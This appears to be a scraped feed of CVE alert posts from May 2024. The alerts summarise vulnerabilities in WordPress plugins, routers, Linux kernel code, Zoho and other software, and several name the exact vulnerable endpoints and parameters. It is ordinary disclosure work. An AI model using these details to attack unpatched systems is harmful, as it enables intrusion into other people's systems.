🚨 CVE-2023-47537An improper certificate validation vulnerability in Fortinet FortiOS 7.0.0 - 7.0.13, 7.2.0 - 7.2.6, 7.4.0 - 7.4.1 and 6.4 all versions allows a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the FortiLink communication channel between the FortiOS device and FortiSwitch.🎖@cveNotify |
|
| 2024-05-21 09:37:25 |
🚨 CVE-2024-4566The ShopLentor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in all versions up to, and including, 2.8.8. This makes it possible for authenticated attackers, with contributor-level access and above, to set arbitrary WordPress options to "true". NOTE: This vulnerability can be exploited by attackers with subscriber- or customer-level access and above if (1) the WooCommerce plugin is deactivated or (2) access to the default WordPress admin dashboard is explicitly enabled for authenticated users.🎖@cveNotify |
|
| 2024-05-21 09:37:24 |
🚨 CVE-2024-3345The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woolentorsearch shortcode in all versions up to, and including, 2.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 06:37:26 |
🚨 CVE-2024-4290The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-21 06:37:25 |
🚨 CVE-2024-4061The Survey Maker WordPress plugin before 4.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-21 06:37:24 |
🚨 CVE-2024-2189The Social Icons Widget & Block by WPZOOM WordPress plugin before 4.2.18 does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-21 05:37:28 |
🚨 CVE-2020-8933A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using the membership to the "lxd" group, an attacker can attach host devices and filesystems. Within an lxc container, it is possible to attach the host OS filesystem and modify /etc/sudoers to then gain administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "lxd" user from the OS Login entry.🎖@cveNotify |
|
| 2024-05-21 05:37:27 |
🚨 CVE-2020-8907A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using their membership to the "docker" group, an attacker with this role is able to run docker and mount the host OS. Within docker, it is possible to modify the host OS filesystem and modify /etc/groups to gain administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "docker" user from the OS Login entry.🎖@cveNotify |
|
| 2024-05-21 05:37:26 |
🚨 CVE-2020-8903A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using their membership to the "adm" group, users with this role are able to read the DHCP XID from the systemd journal. Using the DHCP XID, it is then possible to set the IP address and hostname of the instance to any value, which is then stored in /etc/hosts. An attacker can then point metadata.google.internal to an arbitrary IP address and impersonate the GCE metadata server which make it is possible to instruct the OS Login PAM module to grant administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "adm" user from the OS Login entry.🎖@cveNotify |
|
| 2024-05-21 05:37:25 |
🚨 CVE-2020-8899There is a buffer overwrite vulnerability in the Quram qmg library of Samsung's Android OS versions O(8.x), P(9.0) and Q(10.0). An unauthenticated, unauthorized attacker sending a specially crafted MMS to a vulnerable phone can trigger a heap-based buffer overflow in the Quram image codec leading to an arbitrary remote code execution (RCE) without any user interaction. The Samsung ID is SVE-2020-16747.🎖@cveNotify |
|
| 2024-05-21 04:37:29 |
🚨 CVE-2023-2163Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafecode paths being incorrectly marked as safe, resulting in arbitrary read/write inkernel memory, lateral privilege escalation, and container escape.🎖@cveNotify |
|
| 2024-05-21 04:37:28 |
🚨 CVE-2022-3474A bad credential handling in the remote assets API for Bazel versions prior to 5.3.2 and 4.2.3 sends all user-provided credentials instead of only the required ones for the requests. We recommend upgrading to versions later than or equal to 5.3.2 or 4.2.3.🎖@cveNotify |
|
| 2024-05-21 04:37:27 |
🚨 CVE-2022-1055A use-after-free exists in the Linux Kernel in tc_new_tfilter that could allow a local attacker to gain privilege escalation. The exploit requires unprivileged user namespaces. We recommend upgrading past commit 04c2a47ffb13c29778e2a14e414ad4cb5a5db4b5🎖@cveNotify |
|
| 2024-05-21 03:37:26 |
🚨 CVE-2024-3155The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 02:37:25 |
🚨 CVE-2024-0816The buffer overflow vulnerability in the DX3300-T1 firmware version V5.50(ABVY.4)C0 could allow an authenticated local attacker to cause denial of service (DoS) conditions by executing the CLI command with crafted strings on an affected device.🎖@cveNotify |
|
| 2024-05-21 02:37:24 |
🚨 CVE-2023-37929The buffer overflow vulnerability in the CGI program of the VMG3625-T50B firmware version V5.50(ABPM.8)C0 could allow an authenticated remote attacker to cause denial of service (DoS) conditions by sending a crafted HTTP request to a vulnerable device.🎖@cveNotify |
|
| 2024-05-20 23:37:24 |
🚨 CVE-2024-5145A vulnerability was found in SourceCodester Vehicle Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file /newdriver.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 22:37:25 |
🚨 CVE-2024-4985An authentication bypass vulnerability was present in the GitHub Enterprise Server (GHES) when utilizing SAML single sign-on authentication with the optional encrypted assertions feature. This vulnerability allowed an attacker to forge a SAML response to provision and/or gain access to a user with site administrator privileges. Exploitation of this vulnerability would allow unauthorized access to the instance without requiring prior authentication. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13.0 and was fixed in versions 3.9.15, 3.10.12, 3.11.10 and 3.12.4. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-05-20 22:37:24 |
🚨 CVE-2024-34710Wiki.js is al wiki app built on Node.js. Client side template injection was discovered, that could allow an attacker to inject malicious JavaScript into the content section of pages that would execute once a victim loads the page that contains the payload. This was possible through the injection of a invalid HTML tag with a template injection payload on the next line. This vulnerability is fixed in 2.5.303.🎖@cveNotify |
|
| 2024-05-20 21:37:30 |
🚨 CVE-2024-35194Minder is a software supply chain security platform. Prior to version 0.0.50, Minder engine is susceptible to a denial of service from memory exhaustion that can be triggered from maliciously created templates. Minder engine uses templating to generate strings for various use cases such as URLs, messages for pull requests, descriptions for advisories. In some cases can the user control both the template and the params for it, and in a subset of these cases, Minder reads the generated template entirely into memory. When Minders templating meets both of these conditions, an attacker is able to generate large enough templates that Minder will exhaust memory and crash. This vulnerability is fixed in 0.0.50.🎖@cveNotify |
|
| 2024-05-20 21:37:26 |
🚨 CVE-2024-35192Trivy is a security scanner. Prior to 0.51.2, if a malicious actor is able to trigger Trivy to scan container images from a crafted malicious registry, it could result in the leakage of credentials for legitimate registries such as AWS Elastic Container Registry (ECR), Google Cloud Artifact/Container Registry, or Azure Container Registry (ACR). These tokens can then be used to push/pull images from those registries to which the identity/user running Trivy has access. Systems are not affected if the default credential provider chain is unable to obtain valid credentials. This vulnerability only applies when scanning container images directly from a registry. This vulnerability is fixed in 0.51.2.🎖@cveNotify |
|
| 2024-05-20 21:37:25 |
🚨 CVE-2024-33900KeePassXC 2.7.7 allows attackers to recover cleartext credentials.🎖@cveNotify |
|
| 2024-05-20 21:37:24 |
🚨 CVE-2019-20180The TablePress plugin 1.9.2 for WordPress allows tablepress[data] CSV injection by Editor users. Note: The vendor disputes this issue and argues that this responsibility lies with the application that opens the CSV file and not TablePress.🎖@cveNotify |
|
| 2024-05-20 19:37:48 |
🚨 CVE-2024-35579Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.city.vlan parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-05-20 19:37:47 |
🚨 CVE-2024-35578Tenda AX1806 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-05-20 19:37:46 |
🚨 CVE-2024-35571Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.stb.mode parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-05-20 19:37:41 |
🚨 CVE-2024-34949likeshop 2.5.7 is vulnerable to SQL Injection via the getOrderList function.🎖@cveNotify |
|
| 2024-05-20 19:37:40 |
🚨 CVE-2024-31714Buffer Overflow vulnerability in Waxlab wax v.0.9-3 and before allows an attacker to cause a denial of service via the Lua library component.🎖@cveNotify |
|
| 2024-05-20 19:37:39 |
🚨 CVE-2024-24293A Prototype Pollution issue in MiguelCastillo @bit/loader v.10.0.3 allows an attacker to execute arbitrary code via the M function e argument in index.js.🎖@cveNotify |
|
| 2024-05-20 19:37:35 |
🚨 CVE-2023-49335Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection while getting file server details.🎖@cveNotify |
|
| 2024-05-20 19:37:34 |
🚨 CVE-2023-49334Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL Injection while exporting a full summary report.🎖@cveNotify |
|
| 2024-05-20 19:37:33 |
🚨 CVE-2023-49332Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection while adding file shares.🎖@cveNotify |
|
| 2024-05-20 19:37:32 |
🚨 CVE-2023-49331Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection in the aggregate reports search option.🎖@cveNotify |
|
| 2024-05-20 19:37:28 |
🚨 CVE-2024-34948An issue in Quanxun Huiju Network Technology(Beijing) Co.,Ltd IK-Q3000 3.7.10 x64 Build202401261655 allows attackers to cause a Denial of Service (DoS) when attempting to make TCP connections.🎖@cveNotify |
|
| 2024-05-20 19:37:27 |
🚨 CVE-2024-24294A Prototype Pollution issue in Blackprint @blackprint/engine v.0.9.0 allows an attacker to execute arbitrary code via the _utils.setDeepProperty function of engine.min.js.🎖@cveNotify |
|
| 2024-05-20 19:37:26 |
🚨 CVE-2024-0401ASUS routers supporting custom OpenVPN profiles are vulnerable to a code execution vulnerability. An authenticated and remote attacker can execute arbitrary operating system commands by uploading a crafted OVPN profile. Known affected routers include ASUS ExpertWiFi, ASUS RT-AX55, ASUS RT-AX58U, ASUS RT-AC67U, ASUS RT-AC68R, ASUS RT-AC68U, ASUS RT-AX86, ASUS RT-AC86U, ASUS RT-AX88U, and ASUS RT-AX3000.🎖@cveNotify |
|
| 2024-05-20 19:37:25 |
🚨 CVE-2024-34338Tenda O3V2 with firmware versions V1.0.0.10 and V1.0.0.12 was discovered to contain a Blind Command Injection via dest parameter in /goform/getTraceroute. This vulnerability allows attackers to execute arbitrary commands with root privileges. Authentication is required to exploit this vulnerability.🎖@cveNotify |
|
| 2024-05-20 18:37:41 |
🚨 CVE-2024-35580Tenda AX1806 v1.0.0.1 contains a stack overflow via the adv.iptv.stbpvid parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-05-20 18:37:37 |
🚨 CVE-2024-35578Tenda AX1806 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-05-20 18:37:36 |
🚨 CVE-2024-34949likeshop 2.5.7 is vulnerable to SQL Injection via the getOrderList function.🎖@cveNotify |
|
| 2024-05-20 18:37:32 |
🚨 CVE-2024-31714Buffer Overflow vulnerability in Waxlab wax v.0.9-3 and before allows an attacker to cause a denial of service via the Lua library component.🎖@cveNotify |
|
| 2024-05-20 18:37:31 |
🚨 CVE-2024-29651A Prototype Pollution issue in API Dev Tools json-schema-ref-parser v.11.0.0 and v.11.1.0 allows a remote attacker to execute arbitrary code via the bundle()`, `parse()`, `resolve()`, `dereference() functions.🎖@cveNotify |
|
| 2024-05-20 18:37:30 |
🚨 CVE-2023-49335Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection while getting file server details.🎖@cveNotify |
|
| 2024-05-20 18:37:26 |
🚨 CVE-2023-49333Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection in the dashboard graph feature.🎖@cveNotify |
|
| 2024-05-20 18:37:25 |
🚨 CVE-2023-49331Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL injection in the aggregate reports search option.🎖@cveNotify |
|
| 2024-05-20 18:37:24 |
🚨 CVE-2023-49330Zoho ManageEngine ADAudit Plus versions below 7271 allows SQL Injection while getting aggregate report data.🎖@cveNotify |
|
| 2024-05-20 15:37:31 |
🚨 CVE-2024-3482A Stored Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Enterprise Security Manager and ArcSight Platform. The vulnerability could be remotely exploited.🎖@cveNotify |
|
| 2024-05-20 15:37:30 |
🚨 CVE-2024-34953An issue in taurusxin ncmdump v1.3.2 allows attackers to cause a Denial of Service (DoS) via memory exhaustion by supplying a crafted .ncm file🎖@cveNotify |
|
| 2024-05-20 15:37:27 |
🚨 CVE-2024-34952taurusxin ncmdump v1.3.2 was discovered to contain a segmentation violation via the NeteaseCrypt::FixMetadata() function at /src/ncmcrypt.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted .ncm file.🎖@cveNotify |
|
| 2024-05-20 15:37:26 |
🚨 CVE-2024-4287In mintplex-labs/anything-llm, a vulnerability exists due to improper input validation in the workspace update process. Specifically, the application fails to validate or format JSON data sent in an HTTP POST request to `/api/workspace/:workspace-slug/update`, allowing it to be executed as part of a database query without restrictions. This flaw enables users with a manager role to craft a request that includes nested write operations, effectively allowing them to create new Administrator accounts.🎖@cveNotify |
|
| 2024-05-20 15:37:25 |
🚨 CVE-2024-27312Zoho ManageEngine PAM360 version 6601 is vulnerable to authorization vulnerability which allows a low-privileged user to perform admin actions.Note: This vulnerability affects only the PAM360 6600 version. No other versions are applicable to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 15:37:24 |
🚨 CVE-2023-49330Zoho ManageEngine ADAudit Plus through 7251 allows SQL Injection while getting aggregate report data.🎖@cveNotify |
|
| 2024-05-20 14:37:27 |
🚨 CVE-2024-34953An issue in taurusxin ncmdump v1.3.2 allows attackers to cause a Denial of Service (DoS) via memory exhaustion by supplying a crafted .ncm file🎖@cveNotify |
|
| 2024-05-20 14:37:26 |
🚨 CVE-2024-2835A Stored Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Enterprise Security Manager and ArcSight Platform. The vulnerability could be remotely exploited.🎖@cveNotify |
|
| 2024-05-20 14:37:25 |
🚨 CVE-2024-4761Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-20 13:37:25 |
🚨 CVE-2024-27312Zoho ManageEngine PAM360 version 6601 is vulnerable to authorization vulnerability which allows a low-privileged user to perform admin actions.Note: This vulnerability affects only the PAM360 6600 version. No other versions are applicable to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 13:37:24 |
🚨 CVE-2023-49330Zoho ManageEngine ADAudit Plus through 7251 allows SQL Injection while getting aggregate report data.🎖@cveNotify |
|
| 2024-05-20 13:07:25 |
🚨 CVE-2021-22508A potential vulnerability has been identified for OpenText Operations Bridge Reporter. The vulnerability could be exploited to inject malicious SQL queries. An attack requires to be an authenticated administrator of OBR with network access to the OBR web application.🎖@cveNotify |
|
| 2024-05-20 12:37:24 |
🚨 CVE-2024-4323A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution.🎖@cveNotify |
|
| 2024-05-20 11:37:24 |
🚨 CVE-2024-0443A flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error.🎖@cveNotify |
|
| 2024-05-20 10:37:24 |
🚨 CVE-2024-35948In the Linux kernel, the following vulnerability has been resolved:bcachefs: Check for journal entries overruning end of sb clean sectionFix a missing bounds check in superblock validation.Note that we don't yet have repair code for this case - repair code forindividual items is generally low priority, since the whole superblockis checksummed, validated prior to write, and we have backups.🎖@cveNotify |
|
| 2024-05-20 09:37:25 |
🚨 CVE-2024-5135A vulnerability was found in PHPGurukul Directory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265211.🎖@cveNotify |
|
| 2024-05-20 09:37:24 |
🚨 CVE-2024-3761In lunary-ai/lunary version 1.2.2, the DELETE endpoint located at `packages/backend/src/api/v1/datasets` is vulnerable to unauthorized dataset deletion due to missing authorization and authentication mechanisms. This vulnerability allows any user, even those without a valid token, to delete a dataset by sending a DELETE request to the endpoint. The issue was fixed in version 1.2.8. The impact of this vulnerability is significant as it permits unauthorized users to delete datasets, potentially leading to data loss or disruption of service.🎖@cveNotify |
|
| 2024-05-20 08:37:25 |
🚨 CVE-2024-5123A vulnerability classified as problematic has been found in SourceCodester Event Registration System 1.0. This affects an unknown part of the file /registrar/. The manipulation of the argument searchbar leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265203.🎖@cveNotify |
|
| 2024-05-20 08:37:24 |
🚨 CVE-2024-1968In scrapy/scrapy, an issue was identified where the Authorization header is not removed during redirects that only change the scheme (e.g., HTTPS to HTTP) but remain within the same domain. This behavior contravenes the Fetch standard, which mandates the removal of Authorization headers in cross-origin requests when the scheme, host, or port changes. Consequently, when a redirect downgrades from HTTPS to HTTP, the Authorization header may be inadvertently exposed in plaintext, leading to potential sensitive information disclosure to unauthorized actors. The flaw is located in the _build_redirect_request function of the redirect middleware.🎖@cveNotify |
|
| 2024-05-20 07:37:25 |
🚨 CVE-2024-5122A vulnerability was found in SourceCodester Event Registration System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /registrar/. The manipulation of the argument search leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265202 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 07:37:24 |
🚨 CVE-2024-5121A vulnerability was found in SourceCodester Event Registration System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /registrar/?page=registration. The manipulation of the argument e leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265201 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 06:37:26 |
🚨 CVE-2024-5120A vulnerability was found in SourceCodester Event Registration System 1.0. It has been classified as critical. Affected is an unknown function of the file /registrar/?page=registration. The manipulation of the argument e leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265200.🎖@cveNotify |
|
| 2024-05-20 06:37:25 |
🚨 CVE-2024-3368The All in One SEO WordPress plugin before 4.6.1.1 does not validate and escape some of its Post fields before outputting them back, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-05-20 06:37:24 |
🚨 CVE-2024-5042A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.🎖@cveNotify |
|
| 2024-05-20 05:37:25 |
🚨 CVE-2024-5117A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. This affects an unknown part of the file portal.php. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 05:37:24 |
🚨 CVE-2024-5116A vulnerability, which was classified as critical, has been found in SourceCodester Online Examination System 1.0. Affected by this issue is some unknown functionality of the file save.php. The manipulation of the argument vote leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265196.🎖@cveNotify |
|
| 2024-05-20 04:37:25 |
🚨 CVE-2024-5115A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_profile.php. The manipulation of the argument index leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265105 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 03:37:25 |
🚨 CVE-2024-5114A vulnerability classified as critical has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/teacher_attendance_history1.php. The manipulation of the argument index leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265104.🎖@cveNotify |
|
| 2024-05-20 03:37:24 |
🚨 CVE-2024-5113A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /view/student_profile1.php. The manipulation of the argument std_index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265103.🎖@cveNotify |
|
| 2024-05-20 02:37:25 |
🚨 CVE-2024-5111A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. This affects an unknown part of the file /view/student_payment_invoice1.php. The manipulation of the argument date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265101 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-20 02:37:24 |
🚨 CVE-2024-5110A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view/student_payment_invoice.php. The manipulation of the argument index leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265100.🎖@cveNotify |
|
| 2024-05-20 01:37:24 |
🚨 CVE-2024-5109A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_payment_history.php. The manipulation of the argument index leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265099.🎖@cveNotify |
|
| 2024-05-20 00:37:29 |
🚨 CVE-2024-5107A vulnerability, which was classified as critical, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_payment_details2.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265097 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-19 23:37:25 |
🚨 CVE-2024-5106A vulnerability classified as critical was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file /view/student_payment_details3.php. The manipulation of the argument index leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265096.🎖@cveNotify |
|
| 2024-05-19 16:37:24 |
🚨 CVE-2024-36053In the mintupload package through 4.2.0 for Linux Mint, service-name mishandling leads to command injection via shell metacharacters in check_connection, drop_data_received_cb, and Service.remove. A user can modify a service name in a ~/.linuxmint/mintUpload/services/service file.🎖@cveNotify |
|
| 2024-05-19 14:37:24 |
🚨 CVE-2024-5101A vulnerability was found in SourceCodester Simple Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file updateproduct.php. The manipulation of the argument ITEM leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265084.🎖@cveNotify |
|
| 2024-05-19 12:37:25 |
🚨 CVE-2024-5100A vulnerability was found in SourceCodester Simple Inventory System 1.0. It has been classified as critical. This affects an unknown part of the file tableedit.php. The manipulation of the argument from/to leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265083.🎖@cveNotify |
|
| 2024-05-19 12:37:24 |
🚨 CVE-2024-35947In the Linux kernel, the following vulnerability has been resolved:dyndbg: fix old BUG_ON in >control parserFix a BUG_ON from 2009. Even if it looks "unreachable" (I didn'treally look), lets make sure by removing it, doing pr_err and return-EINVAL instead.🎖@cveNotify |
|
| 2024-05-19 11:37:32 |
🚨 CVE-2024-35925In the Linux kernel, the following vulnerability has been resolved:block: prevent division by zero in blk_rq_stat_sum()The expression dst->nr_samples + src->nr_samples mayhave zero value on overflow. It is necessary to adda check to avoid division by zero.Found by Linux Verification Center (linuxtesting.org) with Svace.🎖@cveNotify |
|
| 2024-05-19 11:37:31 |
🚨 CVE-2024-35923In the Linux kernel, the following vulnerability has been resolved:io_uring: clear opcode specific data for an early failureIf failure happens before the opcode prep handler is called, ensure thatwe clear the opcode specific area of the request, which holds dataspecific to that request type. This prevents errors where opcodehandlers either don't get to clear per-request private data since prepisn't even called.🎖@cveNotify |
|
| 2024-05-19 11:37:30 |
🚨 CVE-2024-35922In the Linux kernel, the following vulnerability has been resolved:fbmon: prevent division by zero in fb_videomode_from_videomode()The expression htotal * vtotal can have a zero value onoverflow. It is necessary to prevent division by zero like infb_var_to_videomode().Found by Linux Verification Center (linuxtesting.org) with Svace.🎖@cveNotify |
|
| 2024-05-19 11:37:27 |
🚨 CVE-2024-35921In the Linux kernel, the following vulnerability has been resolved:media: mediatek: vcodec: Fix oops when HEVC init failsThe stateless HEVC decoder saves the instance pointer in the contextregardless if the initialization worked or not. This caused a use afterfree, when the pointer is freed in case of a failure in the deinitfunction.Only store the instance pointer when the initialization was successful,to solve this issue. Hardware name: Acer Tomato (rev3 - 4) board (DT) pstate: 80400009 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : vcodec_vpu_send_msg+0x4c/0x190 [mtk_vcodec_dec] lr : vcodec_send_ap_ipi+0x78/0x170 [mtk_vcodec_dec] sp : ffff80008750bc20 x29: ffff80008750bc20 x28: ffff1299f6d70000 x27: 0000000000000000 x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000 x23: ffff80008750bc98 x22: 000000000000a003 x21: ffffd45c4cfae000 x20: 0000000000000010 x19: ffff1299fd668310 x18: 000000000000001a x17: 000000040044ffff x16: ffffd45cb15dc648 x15: 0000000000000000 x14: ffff1299c08da1c0 x13: ffffd45cb1f87a10 x12: ffffd45cb2f5fe80 x11: 0000000000000001 x10: 0000000000001b30 x9 : ffffd45c4d12b488 x8 : 1fffe25339380d81 x7 : 0000000000000001 x6 : ffff1299c9c06c00 x5 : 0000000000000132 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000010 x1 : ffff80008750bc98 x0 : 0000000000000000 Call trace: vcodec_vpu_send_msg+0x4c/0x190 [mtk_vcodec_dec] vcodec_send_ap_ipi+0x78/0x170 [mtk_vcodec_dec] vpu_dec_deinit+0x1c/0x30 [mtk_vcodec_dec] vdec_hevc_slice_deinit+0x30/0x98 [mtk_vcodec_dec] vdec_if_deinit+0x38/0x68 [mtk_vcodec_dec] mtk_vcodec_dec_release+0x20/0x40 [mtk_vcodec_dec] fops_vcodec_release+0x64/0x118 [mtk_vcodec_dec] v4l2_release+0x7c/0x100 __fput+0x80/0x2d8 __fput_sync+0x58/0x70 __arm64_sys_close+0x40/0x90 invoke_syscall+0x50/0x128 el0_svc_common.constprop.0+0x48/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x38/0xd8 el0t_64_sync_handler+0xc0/0xc8 el0t_64_sync+0x1a8/0x1b0 Code: d503201f f9401660 b900127f b900227f (f9400400)🎖@cveNotify |
|
| 2024-05-19 11:37:26 |
🚨 CVE-2024-35919In the Linux kernel, the following vulnerability has been resolved:media: mediatek: vcodec: adding lock to protect encoder context listAdd a lock for the ctx_list, to avoid accessing a NULL pointerwithin the 'vpu_enc_ipi_handler' function when the ctx_list hasbeen deleted due to an unexpected behavior on the SCP IP block.🎖@cveNotify |
|
| 2024-05-19 11:37:25 |
🚨 CVE-2023-52699In the Linux kernel, the following vulnerability has been resolved:sysv: don't call sb_bread() with pointers_lock heldsyzbot is reporting sleep in atomic context in SysV filesystem [1], forsb_bread() is called with rw_spinlock held.A "write_lock(&pointers_lock) => read_lock(&pointers_lock) deadlock" bugand a "sb_bread() with write_lock(&pointers_lock)" bug were introduced by"Replace BKL for chain locking with sysvfs-private rwlock" in Linux 2.5.12.Then, "[PATCH] err1-40: sysvfs locking fix" in Linux 2.6.8 fixed theformer bug by moving pointers_lock lock to the callers, but insteadintroduced a "sb_bread() with read_lock(&pointers_lock)" bug (which madethis problem easier to hit).Al Viro suggested that why not to do like get_branch()/get_block()/find_shared() in Minix filesystem does. And doing like that is almost arevert of "[PATCH] err1-40: sysvfs locking fix" except that get_branch() from with find_shared() is called without write_lock(&pointers_lock).🎖@cveNotify |
|
| 2024-05-19 09:37:31 |
